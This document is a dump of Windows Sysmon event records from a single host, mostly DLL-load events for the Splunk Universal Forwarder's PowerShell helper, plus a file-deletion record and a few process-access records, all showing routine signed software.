EventID=7 ImageLoaded (Version=3) | RecordID=99432 | UtcTime=2022-05-30 13:04:49.553 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\netapi32.dll | FileVersion=10.0.14393.5125 (rs1_release.220429-1732) | Description=Net Win32 API DLL | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=NetApi32.DLL | Hashes=MD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99431 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll | FileVersion=14.16.27012.6 built by: vcwrkspc | Description=Microsoft® C Runtime Library | Product=Microsoft® Visual Studio® 2017 | Company=Microsoft Corporation | OriginalFileName=msvcp140.dll | Hashes=MD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DD | Signed=true | Signature=Microsoft Corporation | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99430 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\msvcp_win.dll | FileVersion=10.0.14393.2999 (rs1_release_inmarket.190520-1518) | Description=Microsoft® C Runtime Library | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=msvcp_win.dll | Hashes=MD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59A | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99429 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\oleaut32.dll | FileVersion=10.0.14393.4402 (rs1_release.210426-1725) | Description=OLEAUT32.DLL | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=OLEAUT32.DLL | Hashes=MD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962F | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99428 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\bcryptprimitives.dll | FileVersion=10.0.14393.4770 (rs1_release.211101-1440) | Description=Windows Cryptographic Primitives Library | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=bcryptprimitives.dll | Hashes=MD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99427 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\combase.dll | FileVersion=10.0.14393.5125 (rs1_release.220429-1732) | Description=Microsoft COM for Windows | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=COMBASE.DLL | Hashes=MD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99426 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\Wldap32.dll | FileVersion=10.0.14393.5125 (rs1_release.220429-1732) | Description=Win32 LDAP API DLL | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=WLDAP32.DLL | Hashes=MD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99425 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\ole32.dll | FileVersion=10.0.14393.4651 (rs1_release.210911-1554) | Description=Microsoft OLE for Windows | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=OLE32.DLL | Hashes=MD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99424 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\gdi32full.dll | FileVersion=10.0.14393.5125 (rs1_release.220429-1732) | Description=GDI Client DLL | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=gdi32 | Hashes=MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EE | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99423 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\adsldpc.dll | FileVersion=10.0.14393.0 (rs1_release.160715-1616) | Description=ADs LDAP Provider C DLL | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=adsldpc | Hashes=MD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99422 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\gdi32.dll | FileVersion=10.0.14393.4169 (rs1_release.210107-1130) | Description=GDI Client DLL | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=gdi32 | Hashes=MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00C | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99421 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\win32u.dll | FileVersion=10.0.14393.0 (rs1_release.160715-1616) | Description=Win32u | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=Win32u.DLL | Hashes=MD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99420 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll | FileVersion=14.16.27012.6 built by: vcwrkspc | Description=Microsoft® C Runtime Library | Product=Microsoft® Visual Studio® 2017 | Company=Microsoft Corporation | OriginalFileName=vcruntime140.dll | Hashes=MD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7E | Signed=true | Signature=Microsoft Corporation | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99419 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\user32.dll | FileVersion=10.0.14393.4169 (rs1_release.210107-1130) | Description=Multi-User Windows USER API Client DLL | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=user32 | Hashes=MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99418 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\ws2_32.dll | FileVersion=10.0.14393.3241 (rs1_release_inmarket.190910-1801) | Description=Windows Socket 2.0 32-Bit DLL | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=ws2_32.dll | Hashes=MD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99417 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Program Files\SplunkUniversalForwarder\bin\archive.dll | FileVersion=- | Description=- | Product=- | Company=- | OriginalFileName=- | Hashes=MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44 | Signed=true | Signature=Splunk, Inc. | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99416 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll | FileVersion=1.0.2za | Description=OpenSSL Shared Library | Product=The OpenSSL Toolkit | Company=The OpenSSL Project, http://www.openssl.org/ | OriginalFileName=libeay32.dll | Hashes=MD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFE | Signed=true | Signature=Splunk, Inc. | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99415 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\rpcrt4.dll | FileVersion=10.0.14393.5125 (rs1_release.220429-1732) | Description=Remote Procedure Call Runtime | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=rpcrt4.dll | Hashes=MD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99414 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll | FileVersion=- | Description=- | Product=- | Company=- | OriginalFileName=- | Hashes=MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72E | Signed=true | Signature=Splunk, Inc. | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99413 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll | FileVersion=- | Description=- | Product=- | Company=- | OriginalFileName=- | Hashes=MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2 | Signed=true | Signature=Splunk, Inc. | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99412 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\sechost.dll | FileVersion=10.0.14393.5006 (rs1_release.220301-1704) | Description=Host for SCM/SDDL/LSA Lookup APIs | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=sechost.dll | Hashes=MD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99411 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll | FileVersion=1.0.2za | Description=OpenSSL Shared Library | Product=The OpenSSL Toolkit | Company=The OpenSSL Project, http://www.openssl.org/ | OriginalFileName=ssleay32.dll | Hashes=MD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63 | Signed=true | Signature=Splunk, Inc. | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99410 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\ucrtbase.dll | FileVersion=10.0.14393.3659 (rs1_release_1.200410-1813) | Description=Microsoft® C Runtime Library | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=ucrtbase.dll | Hashes=MD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44C | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99409 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll | FileVersion=- | Description=- | Product=- | Company=- | OriginalFileName=- | Hashes=MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916 | Signed=true | Signature=Splunk, Inc. | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99408 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\msvcrt.dll | FileVersion=7.0.14393.2457 (rs1_release_inmarket.180822-1743) | Description=Windows NT CRT DLL | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=msvcrt.dll | Hashes=MD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAF | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99407 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\activeds.dll | FileVersion=10.0.14393.4169 (rs1_release.210107-1130) | Description=ADs Router Layer DLL | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=ADs | Hashes=MD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBB | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99406 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll | FileVersion=2.9.10 | Description=libxml2 library | Product=libxml2 | Company=- | OriginalFileName=libxml2.dll | Hashes=MD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20 | Signed=true | Signature=Splunk, Inc. | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99405 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\advapi32.dll | FileVersion=10.0.14393.4886 (rs1_release.220104-1735) | Description=Advanced Windows 32 Base API | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=advapi32.dll | Hashes=MD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EA | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=23 FileDelete (Version=5) | RecordID=99404 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-A45C-6294-5601-000000005502} | ProcessId=6368 | User=NT AUTHORITY\SYSTEM | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | Hashes=MD5=CB3D30780205CA56DD4318DE60071019,SHA256=0676A2BFFCEDE24CF0E0594262879CB2CF7012E2A826F65511557BA7B1E99DEA,IMPHASH=00000000000000000000000000000000 | IsExecutable=false | Archived=false - insufficient disk space

EventID=10 ProcessAccess (Version=3) | RecordID=99403 | UtcTime=2022-05-30 13:04:49.537 | SourceProcessGUID={326FD73D-A44C-6294-0901-000000005502} | SourceProcessId=5372 | SourceThreadId=5392 | SourceImage=C:\Windows\system32\conhost.exe | TargetProcessGUID={326FD73D-C0F1-6294-3C0B-000000005502} | TargetProcessId=1388 | TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | GrantedAccess=0x1fffff | CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID=7 ImageLoaded (Version=3) | RecordID=99402 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\KernelBase.dll | FileVersion=10.0.14393.5125 (rs1_release.220429-1732) | Description=Windows NT BASE API Client DLL | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=Kernelbase.dll | Hashes=MD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99401 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\kernel32.dll | FileVersion=10.0.14393.5066 (rs1_release.220401-1841) | Description=Windows NT BASE API Client DLL | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=kernel32 | Hashes=MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99400 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\ntdll.dll | FileVersion=10.0.14393.5006 (rs1_release.220301-1704) | Description=NT Layer DLL | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=ntdll.dll | Hashes=MD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99399 | UtcTime=2022-05-30 13:04:49.537 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | FileVersion=- | Description=- | Product=- | Company=- | OriginalFileName=- | Hashes=MD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9 | Signed=true | Signature=Splunk, Inc. | SignatureStatus=Valid

EventID=10 ProcessAccess (Version=3) | RecordID=99398 | UtcTime=2022-05-30 13:04:49.537 | SourceProcessGUID={326FD73D-A254-6294-0C00-000000005502} | SourceProcessId=848 | SourceThreadId=2056 | SourceImage=C:\Windows\system32\svchost.exe | TargetProcessGUID={326FD73D-A262-6294-2700-000000005502} | TargetProcessId=2872 | TargetImage=C:\Windows\sysmon64.exe | GrantedAccess=0x1400 | CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID=10 ProcessAccess (Version=3) | RecordID=99397 | UtcTime=2022-05-30 13:04:49.537 | SourceProcessGUID={326FD73D-A254-6294-0C00-000000005502} | SourceProcessId=848 | SourceThreadId=2056 | SourceImage=C:\Windows\system32\svchost.exe | TargetProcessGUID={326FD73D-A262-6294-2700-000000005502} | TargetProcessId=2872 | TargetImage=C:\Windows\sysmon64.exe | GrantedAccess=0x1400 | CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

